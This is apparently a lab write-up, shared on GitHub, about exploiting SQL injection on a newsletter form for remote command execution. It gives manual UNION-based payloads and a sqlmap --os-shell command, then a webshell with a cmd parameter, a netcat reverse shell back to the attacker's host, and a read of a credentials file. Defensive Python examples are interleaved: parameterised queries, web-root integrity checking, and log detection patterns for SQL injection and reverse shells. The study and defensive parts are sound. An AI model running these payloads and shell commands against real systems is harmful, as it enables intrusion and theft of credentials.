MalekAlthubiany / SQL1

Exploiting SQL Injection for Remote Command Execution (Manual and Automated)

Introduction

This blog post details the steps to exploit an SQL injection vulnerability in a web application to gain remote command execution. We will use tools like Burp Suite, sqlmap, and netcat to achieve this. The example scenario involves capturing a vulnerable request, determining the number of columns, identifying a suitable column for injection, uploading a webshell, and using netcat to interact with the system.

Prerequisites

  • Basic understanding of SQL injection.
  • Burp Suite for capturing and modifying HTTP requests.
  • sqlmap for automating SQL injection exploitation.
  • netcat for creating a listener to interact with the shell.
  • Authorization to perform penetration testing on the target system.

Steps

Step 1: Capture the Request

Use Burp Suite to intercept the request when subscribing to a newsletter.

  1. Open Burp Suite and configure your browser to use Burp as a proxy.
  2. Navigate to the subscription page of the target web application.
  3. Intercept the HTTP request when you submit the subscription form.

Example intercepted request:

POST /index.php HTTP/1.1
Host: 192.168.176.48
Content-Length: 25
Content-Type: application/x-www-form-urlencoded
...

mail-list=test%40test.com

Step 2: Test for SQL Injection Vulnerability

Modify the intercepted request to test for SQL injection vulnerability by adding a single quote (') to the parameter value.

mail-list=test@test.com'

If the application returns an SQL error, it indicates a potential SQL injection vulnerability.

Step 3: Determine the Number of Columns

Use the ORDER BY clause to determine the number of columns in the SQL query.

  1. Send modified requests with incrementing column numbers until you get an error.

     mail-list=test@test.com' ORDER BY 1--+
     mail-list=test@test.com' ORDER BY 2--+
     ...

  2. The last successful request indicates the number of columns.

Step 4: Identify the Correct Column for Injection

Use the UNION SELECT statement to find a column that can display output.

  1. Test each column with a payload like @@version to retrieve the database version.

     mail-list=test@test.com' UNION SELECT 1,@@version--+
     mail-list=test@test.com' UNION SELECT 1,2,@@version--+
     ...

  2. Adjust the number of columns in the UNION SELECT statement to match the number determined in Step 3.
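The manual probes in Steps 2 to 4 work because the application pastes the mail-list value straight into its SQL text, so a stray quote becomes a syntax error and ORDER BY n fails exactly when n exceeds the column count. The following added example (not code from this repository) reproduces that behaviour against a toy subscribers table in an in-memory SQLite database, which stands in for the target's MySQL back end so it runs offline; the query shape, table and column names are assumptions, and the MySQL-only parts of Step 4 (UNION with @@version) are not modelled. The same probes sent through a parameterised query are stored or compared as plain data and never reach the parser, which is the fix the Conclusion calls for.

```python
import sqlite3

# Added example, not code from the write-up. An in-memory SQLite table stands
# in for the target's MySQL database; names below are assumptions.

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE subscribers (id INTEGER PRIMARY KEY, email TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO subscribers (email) VALUES (?)",
        [("alice@example.com",), ("bob@example.com",)],  # constructed sample rows
    )
    conn.commit()
    return conn

def lookup_vulnerable(conn, email):
    """The anti-pattern: user input is concatenated into the SQL text, so a
    quote or a keyword inside 'email' changes the query itself."""
    sql = "SELECT id, email FROM subscribers WHERE email = '" + email + "'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, email):
    """The fix: a parameterised query. The driver hands 'email' over as data,
    so a quote or ORDER BY inside it is only text compared against the column."""
    return conn.execute(
        "SELECT id, email FROM subscribers WHERE email = ?", (email,)
    ).fetchall()

def probe(lookup, conn, value):
    """Run one lookup and report it the way the application would surface it:
    ('ok', rows) or ('error', message). An error on a bare quote is the signal
    Step 2 looks for; an error on ORDER BY n is the signal Step 3 looks for."""
    try:
        return ("ok", lookup(conn, value))
    except sqlite3.Error as exc:
        return ("error", str(exc))

# The probes from Steps 2 and 3. In the URL-encoded body '--+' decodes to
# '-- ' (comment marker plus space) by the time it reaches the database.
PROBES = [
    "test@test.com'",
    "test@test.com' ORDER BY 1-- ",
    "test@test.com' ORDER BY 3-- ",  # the table has 2 columns, so this errors
]

def compare(conn):
    """Return {probe: (result kind with concatenation, result kind with parameters)}."""
    return {
        p: (probe(lookup_vulnerable, conn, p)[0], probe(lookup_safe, conn, p)[0])
        for p in PROBES
    }

if __name__ == "__main__":
    db = make_db()
    for p, (vuln, safe) in compare(db).items():
        print(f"{p!r:40} concatenated={vuln:5} parameterised={safe}")
```

Only the concatenated version reports errors, and only for the bare quote and for ORDER BY 3; ORDER BY 1 succeeds silently, which is the difference an attacker reads to count columns and the difference a defender can remove by parameterising every query that touches user input.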

Step 5: Automate the Process with sqlmap

To streamline the exploitation process, we used the following sqlmap command:

sqlmap -r request.txt --batch --level=5 --risk=3 --dbs --os-shell --web-root="/var/www/html"

[Screenshot: sqlmap run against request.txt]

Step 6: Start the Listener and Upload a Shell

[Screenshot: starting the listener and uploading the shell]

Step 7: Access the Webshell

[Screenshot: accessing the webshell]

Explanation of the Command

  • -r request.txt: Reads the HTTP request from the file request.txt.
  • --batch: Runs sqlmap in non-interactive mode, assuming default answers to prompts.
  • --level=5: Sets the level of tests to perform (5 is the highest).
  • --risk=3: Sets the risk of tests to perform (3 is the highest).
  • --dbs: Enumerates the databases to confirm vulnerability.
  • --os-shell: Attempts to spawn an interactive operating system shell.
  • --web-root="/var/www/html": Specifies the web root directory for the target server.

Simulated Output

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:22:46 /2024-06-29/

[06:22:46] [INFO] parsing HTTP request from 'request.txt'
[06:22:46] [INFO] testing connection to the target URL
[06:22:46] [INFO] checking if the target is protected by some kind of WAF/IPS
[06:22:46] [INFO] testing if the target URL content is stable
[06:22:46] [INFO] testing if the POST parameter 'mail-list' is dynamic
[06:22:46] [INFO] heuristic (basic) test shows that POST parameter 'mail-list' might be injectable
[06:22:46] [INFO] testing for SQL injection on POST parameter 'mail-list'
[06:22:46] [INFO] confirming SQL injection on POST parameter 'mail-list'
[06:22:46] [INFO] the back-end DBMS is MySQL
[06:22:46] [INFO] fetching databases
[06:22:46] [INFO] retrieved: 'information_schema'
[06:22:46] [INFO] retrieved: 'test_db'
...
[06:22:46] [INFO] trying to upload the file stager
[06:22:46] [INFO] testing MySQL
[06:22:46] [INFO] looking for writable directories
[06:22:46] [INFO] trying to upload the shell
[06:22:46] [INFO] successfully uploaded the web shell to '/var/www/html/shell.php'
[06:22:46] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
www-data
os-shell>
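The line "successfully uploaded the web shell to '/var/www/html/shell.php'" is the point at which a file-level control has something to catch: sqlmap's MySQL stager is written with SELECT ... INTO OUTFILE, which only works when the database account holds the FILE privilege, secure_file_priv does not restrict the path, and the web root is writable by the MySQL server process, so any one of those settings blocks this step. Independently of that, a baseline of the web root makes a newly written PHP file stand out. The following added example (not code from this repository) snapshots the PHP files under a web root, then simulates the drop of shell.php and a tampered index.php in a temporary directory; the directory layout and file contents are constructed, and the placeholder shell.php holds only a comment.

```python
import hashlib
import os
import tempfile

# Added example, not code from the write-up. Which suffixes to watch is an
# assumption; extend it to whatever the server executes (.php, .phtml, .phar).
WATCHED_SUFFIXES = (".php", ".phtml", ".phar")

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(web_root):
    """Map every watched file under web_root (path relative to the root) to its SHA-256."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(web_root):
        for name in files:
            if name.lower().endswith(WATCHED_SUFFIXES):
                full = os.path.join(dirpath, name)
                manifest[os.path.relpath(full, web_root)] = sha256_of(full)
    return manifest

def diff_manifests(baseline, current):
    """Return (added, modified, removed) relative paths, each sorted."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(
        p for p in current if p in baseline and current[p] != baseline[p]
    )
    return added, modified, removed

def demo():
    """Constructed scenario: baseline a tiny web root, then simulate the write
    sqlmap reports ('successfully uploaded the web shell to .../shell.php')
    plus a modification of an existing file."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.php"), "w") as f:
            f.write("<?php echo 'newsletter'; ?>\n")
        os.mkdir(os.path.join(root, "css"))
        with open(os.path.join(root, "css", "site.css"), "w") as f:
            f.write("body {}\n")  # not a watched suffix, so never reported
        baseline = snapshot(root)

        # A new PHP file appears where the stager would be written.
        with open(os.path.join(root, "shell.php"), "w") as f:
            f.write("<?php /* placeholder for an uploaded file */ ?>\n")
        # An existing file is changed in place.
        with open(os.path.join(root, "index.php"), "a") as f:
            f.write("// appended line\n")

        return diff_manifests(baseline, snapshot(root))

if __name__ == "__main__":
    added, modified, removed = demo()
    print("added:", added, "modified:", modified, "removed:", removed)
```

In production the baseline would be written at deploy time and stored outside the web root, and the comparison run on a schedule or from a file-change watcher; a web root that the web server and database user cannot write to makes the added list empty by construction.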

Step 6 (Alternative): Access the Webshell Another Way

Navigate to the webshell in your browser:

http://192.168.176.48/shell.php

Use the cmd parameter to execute commands:

http://192.168.176.48/shell.php?cmd=whoami

Step 7: Set Up netcat Listener

Set up a netcat listener on your machine to interact with the shell.

nc -lvp 4444

Step 8: Connect to the Listener

Use the webshell to connect back to your netcat listener.

http://192.168.176.48/shell.php?cmd=nc [your_ip] 4444 -e /bin/bash

Final Output

Upon connecting to the listener, you should see output similar to the following:

listening on [any] 1234 ...
connect to [192.168.45.247] from (UNKNOWN) [192.168.176.48] 55430
Linux animal-world 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64 GNU/Linux
 06:37:51 up 38 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ cat /var/www/secret.txt
USERNAME:**************
PASSWORD:***************************
$ whoami
www-data
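Every stage of this chain leaves a trace in request logs: the quote and ORDER BY probes of Steps 2 and 3, the UNION SELECT with @@version of Step 4, sqlmap's default User-Agent in Step 5, and the cmd= requests to the webshell in Steps 6 to 8. The following added example (not code from this repository) runs a small set of detection rules over constructed log lines in a combined format extended with a body="..." field, as an application or WAF might record POST bodies; the lines, addresses (TEST-NET ranges) and the sqlmap version string are all constructed, and the rule set is an illustration rather than a complete signature list.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Added example, not code from the write-up. Constructed log lines mirroring
# the steps above; a real access log would need its own body-logging setup.
LOG_LINES = [
    '192.0.2.10 - - [29/Jun/2024:06:20:01 +0000] "POST /index.php HTTP/1.1" 200 512 "Mozilla/5.0" body="mail-list=test%40test.com"',
    '192.0.2.10 - - [29/Jun/2024:06:20:09 +0000] "POST /index.php HTTP/1.1" 500 231 "Mozilla/5.0" body="mail-list=test%40test.com%27"',
    '192.0.2.10 - - [29/Jun/2024:06:20:15 +0000] "POST /index.php HTTP/1.1" 200 512 "Mozilla/5.0" body="mail-list=test%40test.com%27+ORDER+BY+2--+"',
    '192.0.2.10 - - [29/Jun/2024:06:20:22 +0000] "POST /index.php HTTP/1.1" 200 540 "Mozilla/5.0" body="mail-list=test%40test.com%27+UNION+SELECT+1%2C%40%40version--+"',
    '192.0.2.10 - - [29/Jun/2024:06:22:46 +0000] "POST /index.php HTTP/1.1" 200 512 "sqlmap/1.8 (https://sqlmap.org)" body="mail-list=test%40test.com"',
    '192.0.2.10 - - [29/Jun/2024:06:30:02 +0000] "GET /shell.php?cmd=whoami HTTP/1.1" 200 9 "Mozilla/5.0"',
    '192.0.2.10 - - [29/Jun/2024:06:37:51 +0000] "GET /shell.php?cmd=nc+192.0.2.99+4444+-e+/bin/bash HTTP/1.1" 200 0 "Mozilla/5.0"',
    '198.51.100.7 - - [29/Jun/2024:06:40:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "Mozilla/5.0"',
]

# Combined log format plus an optional body="..." field (constructed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ua>[^"]*)"(?: body="(?P<body>[^"]*)")?$'
)

# Rules are applied to decoded parameter values, so URL encoding does not hide them.
SQLI_PATTERNS = [
    ("quote followed by SQL keyword", re.compile(r"'\s*(?:or|and|order\s+by|union|select)\b", re.I)),
    ("UNION SELECT", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("DB fingerprint token", re.compile(r"@@version|information_schema", re.I)),
    ("SQL comment terminator", re.compile(r"--\s|/\*")),
]
CMD_PARAMS = {"cmd", "exec", "command"}  # assumption: names a dropped shell tends to read
REVERSE_SHELL = re.compile(r"\bnc\b.*\s-e\s|/bin/(?:ba)?sh\b|\bbash\s+-i\b", re.I)

def analyse(line):
    """Parse one log line; return None if it does not match the format, else a
    dict with the client, timestamp, target and a list of finding strings."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = list(parse_qsl(m["body"])) if m["body"] else []
    params += parse_qsl(urlsplit(m["target"]).query)
    findings = []
    for name, value in params:
        if value.count("'") % 2 == 1:
            findings.append(f"unbalanced single quote in {name}")
        for label, pat in SQLI_PATTERNS:
            if pat.search(value):
                findings.append(f"{label} in {name}")
        if name.lower() in CMD_PARAMS:
            findings.append(f"OS command parameter {name}={value!r}")
        if REVERSE_SHELL.search(value):
            findings.append(f"reverse shell pattern in {name}")
    if "sqlmap" in m["ua"].lower():
        findings.append("sqlmap user agent")
    return {"ip": m["ip"], "ts": m["ts"], "target": m["target"], "findings": findings}

def scan(lines):
    """Return only the parsed lines that produced at least one finding."""
    return [r for r in map(analyse, lines) if r and r["findings"]]

if __name__ == "__main__":
    for hit in scan(LOG_LINES):
        print(hit["ts"], hit["ip"], hit["target"])
        for f in hit["findings"]:
            print("   -", f)
```

Six of the eight constructed lines are flagged and the two ordinary requests are not. The single-quote check is the noisiest rule (names such as O'Brien trip it), which is why the findings are reported as a list: several findings from one client within a minute, or any hit on the UNION, fingerprint or command rules, is the combination worth alerting on.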

Enumerate All .txt Files on the Machine

To enumerate all .txt files on the machine, you can use the find command. This is useful for locating any potential flags quickly.

$ find / -name "*.txt" 2>/dev/null

  • find /: Starts searching from the root directory.
  • -name "*.txt": Looks for files with a .txt extension.
  • 2>/dev/null: Suppresses permission denied errors.

Conclusion

By following these steps, we successfully exploited an SQL injection vulnerability to upload a webshell and gain remote command execution. Additionally, we demonstrated how to quickly locate .txt files on the system. This process highlights the importance of secure coding practices and regular security assessments to protect web applications from such attacks.

Disclaimer

This blog post is for educational purposes only. Unauthorized testing or exploitation of systems without proper authorization is illegal and unethical. Always obtain explicit permission before conducting security testing on any system.